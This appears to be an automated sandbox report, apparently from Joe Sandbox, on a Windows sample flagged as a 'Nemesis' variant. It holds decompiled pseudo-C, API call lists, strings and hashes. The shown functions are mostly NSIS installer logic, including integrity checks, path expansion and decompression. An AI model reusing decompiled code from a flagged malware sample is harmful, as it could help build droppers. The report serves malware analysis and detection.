                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                        • API String ID: 1975747703-1627606066
                                                                                                                        • Opcode ID: cf3279fe7f0dcda04763d777311536b3ad8b8334462163e510e5c591121a5e62
                                                                                                                        • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                        • Opcode Fuzzy Hash: cf3279fe7f0dcda04763d777311536b3ad8b8334462163e510e5c591121a5e62
                                                                                                                        • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        C-Code - Quality: 78%
                                                                                                                        			E0040307D(void* __eflags, signed int _a4) {
                                                                                                                        				DWORD* _v8;
                                                                                                                        				DWORD* _v12;
                                                                                                                        				void* _v16;
                                                                                                                        				intOrPtr _v20;
                                                                                                                        				char _v24;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				intOrPtr _v36;
                                                                                                                        				intOrPtr _v40;
                                                                                                                        				signed int _v44;
                                                                                                                        				long _t43;
                                                                                                                        				long _t50;
                                                                                                                        				void* _t53;
                                                                                                                        				void* _t57;
                                                                                                                        				intOrPtr* _t59;
                                                                                                                        				long _t60;
                                                                                                                        				long _t70;
                                                                                                                        				signed int _t77;
                                                                                                                        				intOrPtr _t80;
                                                                                                                        				long _t82;
                                                                                                                        				void* _t85;
                                                                                                                        				signed int _t87;
                                                                                                                        				void* _t89;
                                                                                                                        				long _t90;
                                                                                                                        				long _t93;
                                                                                                                        				void* _t94;
                                                                                                                        
                                                                                                                        				_t82 = 0;
                                                                                                                        				_v12 = 0;
                                                                                                                        				_v8 = 0;
                                                                                                                        				_t43 = GetTickCount();
                                                                                                                        				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe";
                                                                                                                        				 *0x434f0c = _t43 + 0x3e8;
                                                                                                                        				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe", 0x400);
                                                                                                                        				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                                                                                        				_v16 = _t89;
                                                                                                                        				 *0x40a018 = _t89;
                                                                                                                        				if(_t89 == 0xffffffff) {
                                                                                                                        					return L"Error launching installer";
                                                                                                                        				}
                                                                                                                        				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                                                                                        				E0040653D(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                                                                                        				E0040653D(0x444000, E00405E58(_t92));
                                                                                                                        				_t50 = GetFileSize(_t89, 0);
                                                                                                                        				 *0x42aa24 = _t50;
                                                                                                                        				_t93 = _t50;
                                                                                                                        				if(_t50 <= 0) {
                                                                                                                        					L24:
                                                                                                                        					E00403019(1);
                                                                                                                        					if( *0x434f14 == _t82) {
                                                                                                                        						goto L29;
                                                                                                                        					}
                                                                                                                        					if(_v8 == _t82) {
                                                                                                                        						L28:
                                                                                                                        						_t34 =  &_v24; // 0x40387d
                                                                                                                        						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                                                                                        						_t94 = _t53;
                                                                                                                        						E004034E5( *0x434f14 + 0x1c);
                                                                                                                        						_t35 =  &_v24; // 0x40387d
                                                                                                                        						_push( *_t35);
                                                                                                                        						_push(_t94);
                                                                                                                        						_push(_t82);
                                                                                                                        						_push(0xffffffff); // executed
                                                                                                                        						_t57 = E004032B4(); // executed
                                                                                                                        						if(_t57 == _v24) {
                                                                                                                        							 *0x434f10 = _t94;
                                                                                                                        							 *0x434f18 =  *_t94;
                                                                                                                        							if((_v44 & 0x00000001) != 0) {
                                                                                                                        								 *0x434f1c =  *0x434f1c + 1;
                                                                                                                        							}
                                                                                                                        							_t40 = _t94 + 0x44; // 0x44
                                                                                                                        							_t59 = _t40;
                                                                                                                        							_t85 = 8;
                                                                                                                        							do {
                                                                                                                        								_t59 = _t59 - 8;
                                                                                                                        								 *_t59 =  *_t59 + _t94;
                                                                                                                        								_t85 = _t85 - 1;
                                                                                                                        							} while (_t85 != 0);
                                                                                                                        							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                                                        							 *(_t94 + 0x3c) = _t60;
                                                                                                                        							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                                                                                        							return 0;
                                                                                                                        						}
                                                                                                                        						goto L29;
                                                                                                                        					}
                                                                                                                        					E004034E5( *0x41ea18);
                                                                                                                        					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                                                                                                                        						goto L29;
                                                                                                                        					} else {
                                                                                                                        						goto L28;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					do {
                                                                                                                        						_t90 = _t93;
                                                                                                                        						asm("sbb eax, eax");
                                                                                                                        						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                                                                                        						if(_t93 >= _t70) {
                                                                                                                        							_t90 = _t70;
                                                                                                                        						}
                                                                                                                        						if(E004034CF(0x416a18, _t90) == 0) {
                                                                                                                        							E00403019(1);
                                                                                                                        							L29:
                                                                                                                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                        						}
                                                                                                                        						if( *0x434f14 != 0) {
                                                                                                                        							if((_a4 & 0x00000002) == 0) {
                                                                                                                        								E00403019(0);
                                                                                                                        							}
                                                                                                                        							goto L20;
                                                                                                                        						}
                                                                                                                        						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                                                                                        						_t77 = _v44;
                                                                                                                        						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                                                                                        							_a4 = _a4 | _t77;
                                                                                                                        							_t87 =  *0x41ea18; // 0x7306a
                                                                                                                        							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                                                                        							_t80 = _v20;
                                                                                                                        							 *0x434f14 = _t87;
                                                                                                                        							if(_t80 > _t93) {
                                                                                                                        								goto L29;
                                                                                                                        							}
                                                                                                                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                                                        								_v8 = _v8 + 1;
                                                                                                                        								_t93 = _t80 - 4;
                                                                                                                        								if(_t90 > _t93) {
                                                                                                                        									_t90 = _t93;
                                                                                                                        								}
                                                                                                                        								goto L20;
                                                                                                                        							} else {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						L20:
                                                                                                                        						if(_t93 <  *0x42aa24) {
                                                                                                                        							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                                                                                        						}
                                                                                                                        						 *0x41ea18 =  *0x41ea18 + _t90;
                                                                                                                        						_t93 = _t93 - _t90;
                                                                                                                        					} while (_t93 != 0);
                                                                                                                        					_t82 = 0;
                                                                                                                        					goto L24;
                                                                                                                        				}
                                                                                                                        			}





























                                                                                                                        0x004032ab
                                                                                                                        0x00000000
                                                                                                                        0x00403251
                                                                                                                        0x0040320b
                                                                                                                        0x0040321d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040310b
                                                                                                                        0x00403110
                                                                                                                        0x00403115
                                                                                                                        0x00403119
                                                                                                                        0x00403120
                                                                                                                        0x00403127
                                                                                                                        0x00403129
                                                                                                                        0x00403129
                                                                                                                        0x00403134
                                                                                                                        0x0040325c
                                                                                                                        0x00403253
                                                                                                                        0x00000000
                                                                                                                        0x00403253
                                                                                                                        0x00403141
                                                                                                                        0x004031c1
                                                                                                                        0x004031c5
                                                                                                                        0x004031ca
                                                                                                                        0x00000000
                                                                                                                        0x004031c1
                                                                                                                        0x0040314a
                                                                                                                        0x0040314f
                                                                                                                        0x00403157
                                                                                                                        0x0040317d
                                                                                                                        0x00403183
                                                                                                                        0x0040318c
                                                                                                                        0x00403192
                                                                                                                        0x00403197
                                                                                                                        0x0040319d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004031a7
                                                                                                                        0x004031af
                                                                                                                        0x004031b2
                                                                                                                        0x004031b7
                                                                                                                        0x004031b9
                                                                                                                        0x004031b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004031a7
                                                                                                                        0x004031cb
                                                                                                                        0x004031d1
                                                                                                                        0x004031dd
                                                                                                                        0x004031dd
                                                                                                                        0x004031e0
                                                                                                                        0x004031e6
                                                                                                                        0x004031e6
                                                                                                                        0x004031ee
                                                                                                                        0x00000000
                                                                                                                        0x004031ee

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                          • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                          • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                        • API String ID: 2803837635-2527967322
                                                                                                                        • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                        • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                        • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                        • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                                                        				struct _ITEMIDLIST* _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				signed int _v20;
                                                                                                                        				signed int _v24;
                                                                                                                        				signed int _v28;
                                                                                                                        				signed int _t44;
                                                                                                                        				WCHAR* _t45;
                                                                                                                        				signed char _t47;
                                                                                                                        				signed int _t48;
                                                                                                                        				short _t59;
                                                                                                                        				short _t61;
                                                                                                                        				short _t63;
                                                                                                                        				void* _t71;
                                                                                                                        				signed int _t77;
                                                                                                                        				signed int _t78;
                                                                                                                        				short _t81;
                                                                                                                        				short _t82;
                                                                                                                        				signed char _t84;
                                                                                                                        				signed int _t85;
                                                                                                                        				intOrPtr _t93;
                                                                                                                        				void* _t98;
                                                                                                                        				void* _t104;
                                                                                                                        				intOrPtr* _t105;
                                                                                                                        				void* _t107;
                                                                                                                        				WCHAR* _t108;
                                                                                                                        				void* _t110;
                                                                                                                        
                                                                                                                        				_t107 = __esi;
                                                                                                                        				_t104 = __edi;
                                                                                                                        				_t71 = __ebx;
                                                                                                                        				_t44 = _a8;
                                                                                                                        				if(_t44 < 0) {
                                                                                                                        					_t93 =  *0x433edc; // 0x6c3640
                                                                                                                        					_t44 =  *(_t93 - 4 + _t44 * 4);
                                                                                                                        				}
                                                                                                                        				_push(_t71);
                                                                                                                        				_push(_t107);
                                                                                                                        				_push(_t104);
                                                                                                                        				_t105 =  *0x434f38 + _t44 * 2;
                                                                                                                        				_t45 = 0x432ea0;
                                                                                                                        				_t108 = 0x432ea0;
                                                                                                                        				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                                                                                        					_t108 = _a4;
                                                                                                                        					_a4 = _a4 & 0x00000000;
                                                                                                                        				}
                                                                                                                        				_t81 =  *_t105;
                                                                                                                        				_a8 = _t81;
                                                                                                                        				if(_t81 == 0) {
                                                                                                                        					L43:
                                                                                                                        					 *_t108 =  *_t108 & 0x00000000;
                                                                                                                        					if(_a4 == 0) {
                                                                                                                        						return _t45;
                                                                                                                        					}
                                                                                                                        					return E0040653D(_a4, _t45);
                                                                                                                        				} else {
                                                                                                                        					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                                                        						_t98 = 2;
                                                                                                                        						_t105 = _t105 + _t98;
                                                                                                                        						if(_t81 >= 4) {
                                                                                                                        							if(__eflags != 0) {
                                                                                                                        								 *_t108 = _t81;
                                                                                                                        								_t108 = _t108 + _t98;
                                                                                                                        								__eflags = _t108;
                                                                                                                        							} else {
                                                                                                                        								 *_t108 =  *_t105;
                                                                                                                        								_t108 = _t108 + _t98;
                                                                                                                        								_t105 = _t105 + _t98;
                                                                                                                        							}
                                                                                                                        							L42:
                                                                                                                        							_t82 =  *_t105;
                                                                                                                        							_a8 = _t82;
                                                                                                                        							if(_t82 != 0) {
                                                                                                                        								_t81 = _a8;
                                                                                                                        								continue;
                                                                                                                        							}
                                                                                                                        							goto L43;
                                                                                                                        						}
                                                                                                                        						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                                                        						_t47 =  *_t105;
                                                                                                                        						_t48 = _t47 & 0x000000ff;
                                                                                                                        						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                                                        						_t85 = _t84 & 0x000000ff;
                                                                                                                        						_v28 = _t48 | 0x00008000;
                                                                                                                        						_t77 = 2;
                                                                                                                        						_v16 = _t85;
                                                                                                                        						_t105 = _t105 + _t77;
                                                                                                                        						_v24 = _t48;
                                                                                                                        						_v20 = _t85 | 0x00008000;
                                                                                                                        						if(_a8 != _t77) {
                                                                                                                        							__eflags = _a8 - 3;
                                                                                                                        							if(_a8 != 3) {
                                                                                                                        								__eflags = _a8 - 1;
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                                                        									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                                                        								}
                                                                                                                        								L38:
                                                                                                                        								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                                                        								_t45 = 0x432ea0;
                                                                                                                        								goto L42;
                                                                                                                        							}
                                                                                                                        							_t78 = _v12;
                                                                                                                        							__eflags = _t78 - 0x1d;
                                                                                                                        							if(_t78 != 0x1d) {
                                                                                                                        								__eflags = (_t78 << 0xb) + 0x436000;
                                                                                                                        								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                                                                                        							} else {
                                                                                                                        								E00406484(_t108,  *0x434f08);
                                                                                                                        							}
                                                                                                                        							__eflags = _t78 + 0xffffffeb - 7;
                                                                                                                        							if(__eflags < 0) {
                                                                                                                        								L29:
                                                                                                                        								E004067C4(_t108);
                                                                                                                        							}
                                                                                                                        							goto L38;
                                                                                                                        						}
                                                                                                                        						if( *0x434f84 != 0) {
                                                                                                                        							_t77 = 4;
                                                                                                                        						}
                                                                                                                        						_t121 = _t48;
                                                                                                                        						if(_t48 >= 0) {
                                                                                                                        							__eflags = _t48 - 0x25;
                                                                                                                        							if(_t48 != 0x25) {
                                                                                                                        								__eflags = _t48 - 0x24;
                                                                                                                        								if(_t48 == 0x24) {
                                                                                                                        									GetWindowsDirectoryW(_t108, 0x400);
                                                                                                                        									_t77 = 0;
                                                                                                                        								}
                                                                                                                        								while(1) {
                                                                                                                        									__eflags = _t77;
                                                                                                                        									if(_t77 == 0) {
                                                                                                                        										goto L26;
                                                                                                                        									}
                                                                                                                        									_t59 =  *0x434f04;
                                                                                                                        									_t77 = _t77 - 1;
                                                                                                                        									__eflags = _t59;
                                                                                                                        									if(_t59 == 0) {
                                                                                                                        										L22:
                                                                                                                        										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                                                        										__eflags = _t61;
                                                                                                                        										if(_t61 != 0) {
                                                                                                                        											L24:
                                                                                                                        											 *_t108 =  *_t108 & 0x00000000;
                                                                                                                        											__eflags =  *_t108;
                                                                                                                        											continue;
                                                                                                                        										}
                                                                                                                        										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                                                        										_a8 = _t61;
                                                                                                                        										__imp__CoTaskMemFree(_v8);
                                                                                                                        										__eflags = _a8;
                                                                                                                        										if(_a8 != 0) {
                                                                                                                        											goto L26;
                                                                                                                        										}
                                                                                                                        										goto L24;
                                                                                                                        									}
                                                                                                                        									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
                                                                                                                        									__eflags = _t63;
                                                                                                                        									if(_t63 == 0) {
                                                                                                                        										goto L26;
                                                                                                                        									}
                                                                                                                        									goto L22;
                                                                                                                        								}
                                                                                                                        								goto L26;
                                                                                                                        							}
                                                                                                                        							GetSystemDirectoryW(_t108, 0x400);
                                                                                                                        							goto L26;
                                                                                                                        						} else {
                                                                                                                        							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                                                                        							if( *_t108 != 0) {
                                                                                                                        								L27:
                                                                                                                        								if(_v16 == 0x1a) {
                                                                                                                        									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                        								}
                                                                                                                        								goto L29;
                                                                                                                        							}
                                                                                                                        							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                                                                                        							L26:
                                                                                                                        							if( *_t108 == 0) {
                                                                                                                        								goto L29;
                                                                                                                        							}
                                                                                                                        							goto L27;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					goto L43;
                                                                                                                        				}
                                                                                                                        			}






























                                                                                                                        0x00000000
                                                                                                                        0x004065da

                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00000000,00425A20,75AF23A0), ref: 004066A8
                                                                                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000), ref: 00406779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                        • String ID: @6l$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                        • API String ID: 4260037668-2146508706
                                                                                                                        • Opcode ID: 71c82525ba0a65243e1f04eb87fe478d36a31e86dfe70ef8bf5ce9ddd18f012c
                                                                                                                        • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                        • Opcode Fuzzy Hash: 71c82525ba0a65243e1f04eb87fe478d36a31e86dfe70ef8bf5ce9ddd18f012c
                                                                                                                        • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                                                        				signed int _v8;
                                                                                                                        				int _v12;
                                                                                                                        				intOrPtr _v16;
                                                                                                                        				long _v20;
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				short _v152;
                                                                                                                        				void* _t65;
                                                                                                                        				void* _t69;
                                                                                                                        				long _t70;
                                                                                                                        				intOrPtr _t75;
                                                                                                                        				long _t76;
                                                                                                                        				intOrPtr _t77;
                                                                                                                        				void* _t78;
                                                                                                                        				int _t88;
                                                                                                                        				intOrPtr _t92;
                                                                                                                        				intOrPtr _t95;
                                                                                                                        				long _t96;
                                                                                                                        				signed int _t97;
                                                                                                                        				int _t98;
                                                                                                                        				int _t99;
                                                                                                                        				intOrPtr _t100;
                                                                                                                        				void* _t101;
                                                                                                                        				void* _t102;
                                                                                                                        
                                                                                                                        				_t97 = _a16;
                                                                                                                        				_t92 = _a12;
                                                                                                                        				_v12 = _t97;
                                                                                                                        				if(_t92 == 0) {
                                                                                                                        					_v12 = 0x8000;
                                                                                                                        				}
                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                        				_v16 = _t92;
                                                                                                                        				if(_t92 == 0) {
                                                                                                                        					_v16 = 0x422a20;
                                                                                                                        				}
                                                                                                                        				_t62 = _a4;
                                                                                                                        				if(_a4 >= 0) {
                                                                                                                        					E004034E5( *0x434f58 + _t62);
                                                                                                                        				}
                                                                                                                        				if(E004034CF( &_a16, 4) == 0) {
                                                                                                                        					L41:
                                                                                                                        					_push(0xfffffffd);
                                                                                                                        					goto L42;
                                                                                                                        				} else {
                                                                                                                        					if((_a19 & 0x00000080) == 0) {
                                                                                                                        						if(_t92 != 0) {
                                                                                                                        							if(_a16 < _t97) {
                                                                                                                        								_t97 = _a16;
                                                                                                                        							}
                                                                                                                        							if(E004034CF(_t92, _t97) != 0) {
                                                                                                                        								_v8 = _t97;
                                                                                                                        								L44:
                                                                                                                        								return _v8;
                                                                                                                        							} else {
                                                                                                                        								goto L41;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(_a16 <= _t92) {
                                                                                                                        							goto L44;
                                                                                                                        						}
                                                                                                                        						_t88 = _v12;
                                                                                                                        						while(1) {
                                                                                                                        							_t98 = _a16;
                                                                                                                        							if(_a16 >= _t88) {
                                                                                                                        								_t98 = _t88;
                                                                                                                        							}
                                                                                                                        							if(E004034CF(0x41ea20, _t98) == 0) {
                                                                                                                        								goto L41;
                                                                                                                        							}
                                                                                                                        							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
                                                                                                                        							if(_t69 == 0) {
                                                                                                                        								L28:
                                                                                                                        								_push(0xfffffffe);
                                                                                                                        								L42:
                                                                                                                        								_pop(_t65);
                                                                                                                        								return _t65;
                                                                                                                        							}
                                                                                                                        							_v8 = _v8 + _t98;
                                                                                                                        							_a16 = _a16 - _t98;
                                                                                                                        							if(_a16 > 0) {
                                                                                                                        								continue;
                                                                                                                        							}
                                                                                                                        							goto L44;
                                                                                                                        						}
                                                                                                                        						goto L41;
                                                                                                                        					}
                                                                                                                        					_t70 = GetTickCount();
                                                                                                                        					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                                                                                        					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                                                                                        					_t14 =  &_a16;
                                                                                                                        					 *_t14 = _a16 & 0x7fffffff;
                                                                                                                        					_v20 = _t70;
                                                                                                                        					 *0x40ce68 = 8;
                                                                                                                        					 *0x416a10 = 0x40ea08;
                                                                                                                        					 *0x416a0c = 0x40ea08;
                                                                                                                        					 *0x416a08 = 0x416a08;
                                                                                                                        					_a4 = _a16;
                                                                                                                        					if( *_t14 <= 0) {
                                                                                                                        						goto L44;
                                                                                                                        					} else {
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					while(1) {
                                                                                                                        						L9:
                                                                                                                        						_t99 = 0x4000;
                                                                                                                        						if(_a16 < 0x4000) {
                                                                                                                        							_t99 = _a16;
                                                                                                                        						}
                                                                                                                        						if(E004034CF(0x41ea20, _t99) == 0) {
                                                                                                                        							goto L41;
                                                                                                                        						}
                                                                                                                        						_a16 = _a16 - _t99;
                                                                                                                        						 *0x40ce58 = 0x41ea20;
                                                                                                                        						 *0x40ce5c = _t99;
                                                                                                                        						while(1) {
                                                                                                                        							_t95 = _v16;
                                                                                                                        							 *0x40ce60 = _t95;
                                                                                                                        							 *0x40ce64 = _v12;
                                                                                                                        							_t75 = E00406A65(0x40ce58);
                                                                                                                        							_v24 = _t75;
                                                                                                                        							if(_t75 < 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t100 =  *0x40ce60; // 0x425a20
                                                                                                                        							_t101 = _t100 - _t95;
                                                                                                                        							_t76 = GetTickCount();
                                                                                                                        							_t96 = _t76;
                                                                                                                        							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                                                        								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                                        								_t102 = _t102 + 0xc;
                                                                                                                        								E0040559F(0,  &_v152); // executed
                                                                                                                        								_v20 = _t96;
                                                                                                                        							}
                                                                                                                        							if(_t101 == 0) {
                                                                                                                        								if(_a16 > 0) {
                                                                                                                        									goto L9;
                                                                                                                        								}
                                                                                                                        								goto L44;
                                                                                                                        							} else {
                                                                                                                        								if(_a12 != 0) {
                                                                                                                        									_t77 =  *0x40ce60; // 0x425a20
                                                                                                                        									_v8 = _v8 + _t101;
